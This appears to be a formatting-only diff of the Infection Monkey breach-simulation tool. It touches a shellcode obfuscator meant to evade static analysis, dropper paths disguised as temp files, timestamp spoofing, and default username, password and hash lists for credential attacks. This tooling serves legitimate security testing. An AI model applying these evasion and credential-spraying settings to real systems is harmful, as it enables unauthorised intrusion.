|
||||||
STATUS_FAILED: "ScoutSuite found logging issues.",
|
STATUS_FAILED: "ScoutSuite found logging issues.",
|
||||||
STATUS_PASSED: "ScoutSuite found no logging issues."
|
STATUS_PASSED: "ScoutSuite found no logging issues.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
|
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
|
||||||
PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
|
PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_SCOUTSUITE_SERVICE_SECURITY: {
|
TEST_SCOUTSUITE_SERVICE_SECURITY: {
|
||||||
TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
|
TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "ScoutSuite found service security issues.",
|
STATUS_FAILED: "ScoutSuite found service security issues.",
|
||||||
STATUS_PASSED: "ScoutSuite found no service security issues."
|
STATUS_PASSED: "ScoutSuite found no service security issues.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
|
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
|
||||||
PILLARS_KEY: [DEVICES, NETWORKS],
|
PILLARS_KEY: [DEVICES, NETWORKS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
}
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
|
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
|
||||||
|
@ -282,7 +290,7 @@ PILLARS_TO_TESTS = {
|
||||||
DEVICES: [],
|
DEVICES: [],
|
||||||
WORKLOADS: [],
|
WORKLOADS: [],
|
||||||
VISIBILITY_ANALYTICS: [],
|
VISIBILITY_ANALYTICS: [],
|
||||||
AUTOMATION_ORCHESTRATION: []
|
AUTOMATION_ORCHESTRATION: [],
|
||||||
}
|
}
|
||||||
|
|
||||||
PRINCIPLES_TO_TESTS = {}
|
PRINCIPLES_TO_TESTS = {}
|
||||||
|
|
|
@ -1,13 +1,13 @@
|
||||||
AWS_KEYS_PATH = ['internal', 'monkey', 'aws_keys']
|
AWS_KEYS_PATH = ["internal", "monkey", "aws_keys"]
|
||||||
STARTED_ON_ISLAND_PATH = ['internal', 'general', 'started_on_island']
|
STARTED_ON_ISLAND_PATH = ["internal", "general", "started_on_island"]
|
||||||
EXPORT_MONKEY_TELEMS_PATH = ['internal', 'testing', 'export_monkey_telems']
|
EXPORT_MONKEY_TELEMS_PATH = ["internal", "testing", "export_monkey_telems"]
|
||||||
CURRENT_SERVER_PATH = ['internal', 'island_server', 'current_server']
|
CURRENT_SERVER_PATH = ["internal", "island_server", "current_server"]
|
||||||
SSH_KEYS_PATH = ['internal', 'exploits', 'exploit_ssh_keys']
|
SSH_KEYS_PATH = ["internal", "exploits", "exploit_ssh_keys"]
|
||||||
INACCESSIBLE_SUBNETS_PATH = ['basic_network', 'network_analysis', 'inaccessible_subnets']
|
INACCESSIBLE_SUBNETS_PATH = ["basic_network", "network_analysis", "inaccessible_subnets"]
|
||||||
USER_LIST_PATH = ['basic', 'credentials', 'exploit_user_list']
|
USER_LIST_PATH = ["basic", "credentials", "exploit_user_list"]
|
||||||
PASSWORD_LIST_PATH = ['basic', 'credentials', 'exploit_password_list']
|
PASSWORD_LIST_PATH = ["basic", "credentials", "exploit_password_list"]
|
||||||
EXPLOITER_CLASSES_PATH = ['basic', 'exploiters', 'exploiter_classes']
|
EXPLOITER_CLASSES_PATH = ["basic", "exploiters", "exploiter_classes"]
|
||||||
SUBNET_SCAN_LIST_PATH = ['basic_network', 'scope', 'subnet_scan_list']
|
SUBNET_SCAN_LIST_PATH = ["basic_network", "scope", "subnet_scan_list"]
|
||||||
LOCAL_NETWORK_SCAN_PATH = ['basic_network', 'scope', 'local_network_scan']
|
LOCAL_NETWORK_SCAN_PATH = ["basic_network", "scope", "local_network_scan"]
|
||||||
LM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_lm_hash_list']
|
LM_HASH_LIST_PATH = ["internal", "exploits", "exploit_lm_hash_list"]
|
||||||
NTLM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_ntlm_hash_list']
|
NTLM_HASH_LIST_PATH = ["internal", "exploits", "exploit_ntlm_hash_list"]
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
|
@ -5,7 +5,7 @@ import socket
|
||||||
import struct
|
import struct
|
||||||
from abc import ABCMeta, abstractmethod
|
from abc import ABCMeta, abstractmethod
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = "itamar"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -48,14 +48,14 @@ class NetworkRange(object, metaclass=ABCMeta):
|
||||||
address_str = address_str.strip()
|
address_str = address_str.strip()
|
||||||
if NetworkRange.check_if_range(address_str):
|
if NetworkRange.check_if_range(address_str):
|
||||||
return IpRange(ip_range=address_str)
|
return IpRange(ip_range=address_str)
|
||||||
if -1 != address_str.find('/'):
|
if -1 != address_str.find("/"):
|
||||||
return CidrRange(cidr_range=address_str)
|
return CidrRange(cidr_range=address_str)
|
||||||
return SingleIpRange(ip_address=address_str)
|
return SingleIpRange(ip_address=address_str)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def check_if_range(address_str):
|
def check_if_range(address_str):
|
||||||
if -1 != address_str.find('-'):
|
if -1 != address_str.find("-"):
|
||||||
ips = address_str.split('-')
|
ips = address_str.split("-")
|
||||||
try:
|
try:
|
||||||
ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
|
ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
|
||||||
except ValueError:
|
except ValueError:
|
||||||
|
@ -85,28 +85,36 @@ class CidrRange(NetworkRange):
|
||||||
return ipaddress.ip_address(ip_address) in self._ip_network
|
return ipaddress.ip_address(ip_address) in self._ip_network
|
||||||
|
|
||||||
def _get_range(self):
|
def _get_range(self):
|
||||||
return [CidrRange._ip_to_number(str(x)) for x in self._ip_network if x != self._ip_network.broadcast_address]
|
return [
|
||||||
|
CidrRange._ip_to_number(str(x))
|
||||||
|
for x in self._ip_network
|
||||||
|
if x != self._ip_network.broadcast_address
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
class IpRange(NetworkRange):
|
class IpRange(NetworkRange):
|
||||||
def __init__(self, ip_range=None, lower_end_ip=None, higher_end_ip=None, shuffle=True):
|
def __init__(self, ip_range=None, lower_end_ip=None, higher_end_ip=None, shuffle=True):
|
||||||
super(IpRange, self).__init__(shuffle=shuffle)
|
super(IpRange, self).__init__(shuffle=shuffle)
|
||||||
if ip_range is not None:
|
if ip_range is not None:
|
||||||
addresses = ip_range.split('-')
|
addresses = ip_range.split("-")
|
||||||
if len(addresses) != 2:
|
if len(addresses) != 2:
|
||||||
raise ValueError('Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20' % ip_range)
|
raise ValueError(
|
||||||
|
"Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range
|
||||||
|
)
|
||||||
self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses]
|
self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses]
|
||||||
elif (lower_end_ip is not None) and (higher_end_ip is not None):
|
elif (lower_end_ip is not None) and (higher_end_ip is not None):
|
||||||
self._lower_end_ip = lower_end_ip.strip()
|
self._lower_end_ip = lower_end_ip.strip()
|
||||||
self._higher_end_ip = higher_end_ip.strip()
|
self._higher_end_ip = higher_end_ip.strip()
|
||||||
else:
|
else:
|
||||||
raise ValueError('Illegal IP range: %s' % ip_range)
|
raise ValueError("Illegal IP range: %s" % ip_range)
|
||||||
|
|
||||||
self._lower_end_ip_num = self._ip_to_number(self._lower_end_ip)
|
self._lower_end_ip_num = self._ip_to_number(self._lower_end_ip)
|
||||||
self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip)
|
self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip)
|
||||||
if self._higher_end_ip_num < self._lower_end_ip_num:
|
if self._higher_end_ip_num < self._lower_end_ip_num:
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
'Higher end IP %s is smaller than lower end IP %s' % (self._lower_end_ip, self._higher_end_ip))
|
"Higher end IP %s is smaller than lower end IP %s"
|
||||||
|
% (self._lower_end_ip, self._higher_end_ip)
|
||||||
|
)
|
||||||
|
|
||||||
def __repr__(self):
|
def __repr__(self):
|
||||||
return "<IpRange %s-%s>" % (self._lower_end_ip, self._higher_end_ip)
|
return "<IpRange %s-%s>" % (self._lower_end_ip, self._higher_end_ip)
|
||||||
|
@ -156,7 +164,7 @@ class SingleIpRange(NetworkRange):
|
||||||
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
|
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
|
||||||
"""
|
"""
|
||||||
# The most common use case is to enter ip/range into "Scan IP/subnet list"
|
# The most common use case is to enter ip/range into "Scan IP/subnet list"
|
||||||
domain_name = ''
|
domain_name = ""
|
||||||
|
|
||||||
# Try casting user's input as IP
|
# Try casting user's input as IP
|
||||||
try:
|
try:
|
||||||
|
@ -167,8 +175,10 @@ class SingleIpRange(NetworkRange):
|
||||||
ip = socket.gethostbyname(string_)
|
ip = socket.gethostbyname(string_)
|
||||||
domain_name = string_
|
domain_name = string_
|
||||||
except socket.error:
|
except socket.error:
|
||||||
LOG.error("Your specified host: {} is not found as a domain name and"
|
LOG.error(
|
||||||
" it's not an IP address".format(string_))
|
"Your specified host: {} is not found as a domain name and"
|
||||||
|
" it's not an IP address".format(string_)
|
||||||
|
)
|
||||||
return None, string_
|
return None, string_
|
||||||
# If a string_ was entered instead of IP we presume that it was domain name and translate it
|
# If a string_ was entered instead of IP we presume that it was domain name and translate it
|
||||||
return ip, domain_name
|
return ip, domain_name
|
||||||
|
|
|
@ -15,6 +15,6 @@ def get_host_from_network_location(network_location: str) -> str:
|
||||||
|
|
||||||
def remove_port(url):
|
def remove_port(url):
|
||||||
parsed = urlparse(url)
|
parsed = urlparse(url)
|
||||||
with_port = f'{parsed.scheme}://{parsed.netloc}'
|
with_port = f"{parsed.scheme}://{parsed.netloc}"
|
||||||
without_port = re.sub(':[0-9]+(?=$|/)', '', with_port)
|
without_port = re.sub(":[0-9]+(?=$|/)", "", with_port)
|
||||||
return without_port
|
return without_port
|
||||||
|
|
|
@ -12,6 +12,6 @@ class TestNetworkUtils(TestCase):
|
||||||
assert get_host_from_network_location("user:password@host:8080") == "host"
|
assert get_host_from_network_location("user:password@host:8080") == "host"
|
||||||
|
|
||||||
def test_remove_port_from_url(self):
|
def test_remove_port_from_url(self):
|
||||||
assert remove_port('https://google.com:80') == 'https://google.com'
|
assert remove_port("https://google.com:80") == "https://google.com"
|
||||||
assert remove_port('https://8.8.8.8:65336') == 'https://8.8.8.8'
|
assert remove_port("https://8.8.8.8:65336") == "https://8.8.8.8"
|
||||||
assert remove_port('ftp://ftpserver.com:21/hello/world') == 'ftp://ftpserver.com'
|
assert remove_port("ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com"
|
||||||
|
|
|
@ -8,21 +8,13 @@ class TestSegmentationUtils:
|
||||||
target = CidrRange("2.2.2.0/24")
|
target = CidrRange("2.2.2.0/24")
|
||||||
|
|
||||||
# IP not in both
|
# IP not in both
|
||||||
assert get_ip_in_src_and_not_in_dst(
|
assert get_ip_in_src_and_not_in_dst(["3.3.3.3", "4.4.4.4"], source, target) is None
|
||||||
["3.3.3.3", "4.4.4.4"], source, target
|
|
||||||
) is None
|
|
||||||
|
|
||||||
# IP not in source, in target
|
# IP not in source, in target
|
||||||
assert (get_ip_in_src_and_not_in_dst(
|
assert (get_ip_in_src_and_not_in_dst(["2.2.2.2"], source, target)) is None
|
||||||
["2.2.2.2"], source, target
|
|
||||||
)) is None
|
|
||||||
|
|
||||||
# IP in source, not in target
|
# IP in source, not in target
|
||||||
assert (get_ip_in_src_and_not_in_dst(
|
assert get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, target)
|
||||||
["8.8.8.8", "1.1.1.1"], source, target
|
|
||||||
))
|
|
||||||
|
|
||||||
# IP in both subnets
|
# IP in both subnets
|
||||||
assert (get_ip_in_src_and_not_in_dst(
|
assert (get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, source)) is None
|
||||||
["8.8.8.8", "1.1.1.1"], source, source
|
|
||||||
)) is None
|
|
||||||
|
|
|
@ -13,17 +13,29 @@ class ScanStatus(Enum):
|
||||||
|
|
||||||
|
|
||||||
class UsageEnum(Enum):
|
class UsageEnum(Enum):
|
||||||
SMB = {ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
|
SMB = {
|
||||||
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."}
|
ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
|
||||||
MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
|
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
|
||||||
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."}
|
}
|
||||||
MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
|
MIMIKATZ = {
|
||||||
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."}
|
ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
|
||||||
DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
|
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
|
||||||
SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
|
}
|
||||||
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
|
MIMIKATZ_WINAPI = {
|
||||||
" for monkey process wasn't successful."}
|
ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
|
||||||
DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
|
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
|
||||||
|
}
|
||||||
|
DROPPER = {
|
||||||
|
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
|
||||||
|
}
|
||||||
|
SINGLETON_WINAPI = {
|
||||||
|
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
|
||||||
|
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
|
||||||
|
" for monkey process wasn't successful.",
|
||||||
|
}
|
||||||
|
DROPPER_WINAPI = {
|
||||||
|
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
# Dict that describes what BITS job was used for
|
# Dict that describes what BITS job was used for
|
||||||
|
@ -31,8 +43,10 @@ BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system."
|
||||||
|
|
||||||
|
|
||||||
def format_time(time):
|
def format_time(time):
|
||||||
return "%s-%s %s:%s:%s" % (time.date().month,
|
return "%s-%s %s:%s:%s" % (
|
||||||
time.date().day,
|
time.date().month,
|
||||||
time.time().hour,
|
time.date().day,
|
||||||
time.time().minute,
|
time.time().hour,
|
||||||
time.time().second)
|
time.time().minute,
|
||||||
|
time.time().second,
|
||||||
|
)
|
||||||
|
|
|
@ -1,14 +1,13 @@
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
if sys.platform == 'win32':
|
if sys.platform == "win32":
|
||||||
import win32com
|
import win32com
|
||||||
import wmi
|
import wmi
|
||||||
|
|
||||||
__author__ = 'maor.rayzin'
|
__author__ = "maor.rayzin"
|
||||||
|
|
||||||
|
|
||||||
class MongoUtils:
|
class MongoUtils:
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
# Static class
|
# Static class
|
||||||
pass
|
pass
|
||||||
|
@ -35,7 +34,10 @@ class MongoUtils:
|
||||||
try:
|
try:
|
||||||
# objectSid property of ds_user is problematic and need this special treatment.
|
# objectSid property of ds_user is problematic and need this special treatment.
|
||||||
# ISWbemObjectEx interface. Class Uint8Array ?
|
# ISWbemObjectEx interface. Class Uint8Array ?
|
||||||
if str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}":
|
if (
|
||||||
|
str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid)
|
||||||
|
== "{269AD56A-8A67-4129-BC8C-0506DCFE9880}"
|
||||||
|
):
|
||||||
return o.Value
|
return o.Value
|
||||||
except Exception:
|
except Exception:
|
||||||
pass
|
pass
|
||||||
|
|
|
@ -9,8 +9,8 @@ from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
|
||||||
|
|
||||||
# We only encrypt payloads to hide them from static analysis
|
# We only encrypt payloads to hide them from static analysis
|
||||||
# it's OK to have these keys plaintext
|
# it's OK to have these keys plaintext
|
||||||
KEY = b'1234567890123456'
|
KEY = b"1234567890123456"
|
||||||
NONCE = b'\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f'
|
NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f"
|
||||||
|
|
||||||
|
|
||||||
# Use this manually to get obfuscated bytes of shellcode
|
# Use this manually to get obfuscated bytes of shellcode
|
||||||
|
|
|
@ -2,12 +2,11 @@ from unittest import TestCase
|
||||||
|
|
||||||
from common.utils.shellcode_obfuscator import clarify, obfuscate
|
from common.utils.shellcode_obfuscator import clarify, obfuscate
|
||||||
|
|
||||||
SHELLCODE = b'1234567890abcd'
|
SHELLCODE = b"1234567890abcd"
|
||||||
OBFUSCATED_SHELLCODE = b'\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^='
|
OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^="
|
||||||
|
|
||||||
|
|
||||||
class TestShellcodeObfuscator(TestCase):
|
class TestShellcodeObfuscator(TestCase):
|
||||||
|
|
||||||
def test_obfuscate(self):
|
def test_obfuscate(self):
|
||||||
assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
|
assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
|
||||||
|
|
||||||
|
|
|
@ -8,11 +8,10 @@ if sys.platform.startswith("win"):
|
||||||
|
|
||||||
from .mongo_utils import MongoUtils
|
from .mongo_utils import MongoUtils
|
||||||
|
|
||||||
__author__ = 'maor.rayzin'
|
__author__ = "maor.rayzin"
|
||||||
|
|
||||||
|
|
||||||
class WMIUtils:
|
class WMIUtils:
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
# Static class
|
# Static class
|
||||||
pass
|
pass
|
||||||
|
|
|
@ -16,10 +16,12 @@ def get_version(build=BUILD):
|
||||||
|
|
||||||
def print_version():
|
def print_version():
|
||||||
parser = argparse.ArgumentParser()
|
parser = argparse.ArgumentParser()
|
||||||
parser.add_argument("-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str)
|
parser.add_argument(
|
||||||
|
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
|
||||||
|
)
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
print(get_version(args.build))
|
print(get_version(args.build))
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == "__main__":
|
||||||
print_version()
|
print_version()
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
|
@ -5,14 +5,19 @@ import uuid
|
||||||
from abc import ABCMeta
|
from abc import ABCMeta
|
||||||
from itertools import product
|
from itertools import product
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = "itamar"
|
||||||
|
|
||||||
GUID = str(uuid.getnode())
|
GUID = str(uuid.getnode())
|
||||||
|
|
||||||
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
|
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "monkey.bin")
|
||||||
|
|
||||||
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys", "aws_secret_access_key",
|
SENSITIVE_FIELDS = [
|
||||||
"aws_session_token"]
|
"exploit_password_list",
|
||||||
|
"exploit_user_list",
|
||||||
|
"exploit_ssh_keys",
|
||||||
|
"aws_secret_access_key",
|
||||||
|
"aws_session_token",
|
||||||
|
]
|
||||||
LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"]
|
LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"]
|
||||||
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
|
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
|
||||||
|
|
||||||
|
@ -21,7 +26,7 @@ class Configuration(object):
|
||||||
def from_kv(self, formatted_data):
|
def from_kv(self, formatted_data):
|
||||||
unknown_items = []
|
unknown_items = []
|
||||||
for key, value in list(formatted_data.items()):
|
for key, value in list(formatted_data.items()):
|
||||||
if key.startswith('_'):
|
if key.startswith("_"):
|
||||||
continue
|
continue
|
||||||
if key in LOCAL_CONFIG_VARS:
|
if key in LOCAL_CONFIG_VARS:
|
||||||
continue
|
continue
|
||||||
|
@ -45,7 +50,7 @@ class Configuration(object):
|
||||||
def as_dict(self):
|
def as_dict(self):
|
||||||
result = {}
|
result = {}
|
||||||
for key in dir(Configuration):
|
for key in dir(Configuration):
|
||||||
if key.startswith('_'):
|
if key.startswith("_"):
|
||||||
continue
|
continue
|
||||||
try:
|
try:
|
||||||
value = getattr(self, key)
|
value = getattr(self, key)
|
||||||
|
@ -75,10 +80,10 @@ class Configuration(object):
|
||||||
###########################
|
###########################
|
||||||
|
|
||||||
use_file_logging = True
|
use_file_logging = True
|
||||||
dropper_log_path_windows = '%temp%\\~df1562.tmp'
|
dropper_log_path_windows = "%temp%\\~df1562.tmp"
|
||||||
dropper_log_path_linux = '/tmp/user-1562'
|
dropper_log_path_linux = "/tmp/user-1562"
|
||||||
monkey_log_path_windows = '%temp%\\~df1563.tmp'
|
monkey_log_path_windows = "%temp%\\~df1563.tmp"
|
||||||
monkey_log_path_linux = '/tmp/user-1563'
|
monkey_log_path_linux = "/tmp/user-1563"
|
||||||
send_log_to_server = True
|
send_log_to_server = True
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
|
@ -88,16 +93,16 @@ class Configuration(object):
|
||||||
dropper_try_move_first = True
|
dropper_try_move_first = True
|
||||||
dropper_set_date = True
|
dropper_set_date = True
|
||||||
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
||||||
dropper_date_reference_path_linux = '/bin/sh'
|
dropper_date_reference_path_linux = "/bin/sh"
|
||||||
dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe"
|
dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe"
|
||||||
dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe"
|
dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe"
|
||||||
dropper_target_path_linux = '/tmp/monkey'
|
dropper_target_path_linux = "/tmp/monkey"
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
# Kill file
|
# Kill file
|
||||||
###########################
|
###########################
|
||||||
kill_file_path_windows = '%windir%\\monkey.not'
|
kill_file_path_windows = "%windir%\\monkey.not"
|
||||||
kill_file_path_linux = '/var/run/monkey.not'
|
kill_file_path_linux = "/var/run/monkey.not"
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
# monkey config
|
# monkey config
|
||||||
|
@ -134,9 +139,7 @@ class Configuration(object):
|
||||||
current_server = ""
|
current_server = ""
|
||||||
|
|
||||||
# Configuration servers to try to connect to, in this order.
|
# Configuration servers to try to connect to, in this order.
|
||||||
command_servers = [
|
command_servers = ["192.0.2.0:5000"]
|
||||||
"192.0.2.0:5000"
|
|
||||||
]
|
|
||||||
|
|
||||||
# sets whether or not to locally save the running configuration after finishing
|
# sets whether or not to locally save the running configuration after finishing
|
||||||
serialize_config = False
|
serialize_config = False
|
||||||
|
@ -150,7 +153,7 @@ class Configuration(object):
|
||||||
keep_tunnel_open_time = 60
|
keep_tunnel_open_time = 60
|
||||||
|
|
||||||
# Monkey files directory name
|
# Monkey files directory name
|
||||||
monkey_dir_name = 'monkey_dir'
|
monkey_dir_name = "monkey_dir"
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
# scanners config
|
# scanners config
|
||||||
|
@ -165,22 +168,14 @@ class Configuration(object):
|
||||||
blocked_ips = []
|
blocked_ips = []
|
||||||
|
|
||||||
# TCP Scanner
|
# TCP Scanner
|
||||||
HTTP_PORTS = [80, 8080, 443,
|
HTTP_PORTS = [
|
||||||
8008, # HTTP alternate
|
80,
|
||||||
7001 # Oracle Weblogic default server port
|
8080,
|
||||||
]
|
443,
|
||||||
tcp_target_ports = [22,
|
8008, # HTTP alternate
|
||||||
2222,
|
7001, # Oracle Weblogic default server port
|
||||||
445,
|
]
|
||||||
135,
|
tcp_target_ports = [22, 2222, 445, 135, 3389, 80, 8080, 443, 8008, 3306, 9200, 5432]
|
||||||
3389,
|
|
||||||
80,
|
|
||||||
8080,
|
|
||||||
443,
|
|
||||||
8008,
|
|
||||||
3306,
|
|
||||||
9200,
|
|
||||||
5432]
|
|
||||||
tcp_target_ports.extend(HTTP_PORTS)
|
tcp_target_ports.extend(HTTP_PORTS)
|
||||||
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
||||||
tcp_scan_interval = 0 # in milliseconds
|
tcp_scan_interval = 0 # in milliseconds
|
||||||
|
@ -221,11 +216,11 @@ class Configuration(object):
|
||||||
:return:
|
:return:
|
||||||
"""
|
"""
|
||||||
cred_list = []
|
cred_list = []
|
||||||
for cred in product(self.exploit_user_list, self.exploit_password_list, [''], ['']):
|
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
|
||||||
cred_list.append(cred)
|
cred_list.append(cred)
|
||||||
for cred in product(self.exploit_user_list, [''], [''], self.exploit_ntlm_hash_list):
|
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
|
||||||
cred_list.append(cred)
|
cred_list.append(cred)
|
||||||
for cred in product(self.exploit_user_list, [''], self.exploit_lm_hash_list, ['']):
|
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
|
||||||
cred_list.append(cred)
|
cred_list.append(cred)
|
||||||
return cred_list
|
return cred_list
|
||||||
|
|
||||||
|
@ -241,15 +236,15 @@ class Configuration(object):
|
||||||
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
|
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
|
||||||
return password_hashed
|
return password_hashed
|
||||||
|
|
||||||
exploit_user_list = ['Administrator', 'root', 'user']
|
exploit_user_list = ["Administrator", "root", "user"]
|
||||||
exploit_password_list = ["Password1!", "1234", "password", "12345678"]
|
exploit_password_list = ["Password1!", "1234", "password", "12345678"]
|
||||||
exploit_lm_hash_list = []
|
exploit_lm_hash_list = []
|
||||||
exploit_ntlm_hash_list = []
|
exploit_ntlm_hash_list = []
|
||||||
exploit_ssh_keys = []
|
exploit_ssh_keys = []
|
||||||
|
|
||||||
aws_access_key_id = ''
|
aws_access_key_id = ""
|
||||||
aws_secret_access_key = ''
|
aws_secret_access_key = ""
|
||||||
aws_session_token = ''
|
aws_session_token = ""
|
||||||
|
|
||||||
# smb/wmi exploiter
|
# smb/wmi exploiter
|
||||||
smb_download_timeout = 300 # timeout in seconds
|
smb_download_timeout = 300 # timeout in seconds
|
||||||
|
@ -258,7 +253,16 @@ class Configuration(object):
|
||||||
# Timeout (in seconds) for sambacry's trigger to yield results.
|
# Timeout (in seconds) for sambacry's trigger to yield results.
|
||||||
sambacry_trigger_timeout = 5
|
sambacry_trigger_timeout = 5
|
||||||
# Folder paths to guess share lies inside.
|
# Folder paths to guess share lies inside.
|
||||||
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
|
sambacry_folder_paths_to_guess = [
|
||||||
|
"/",
|
||||||
|
"/mnt",
|
||||||
|
"/tmp",
|
||||||
|
"/storage",
|
||||||
|
"/export",
|
||||||
|
"/share",
|
||||||
|
"/shares",
|
||||||
|
"/home",
|
||||||
|
]
|
||||||
# Shares to not check if they're writable.
|
# Shares to not check if they're writable.
|
||||||
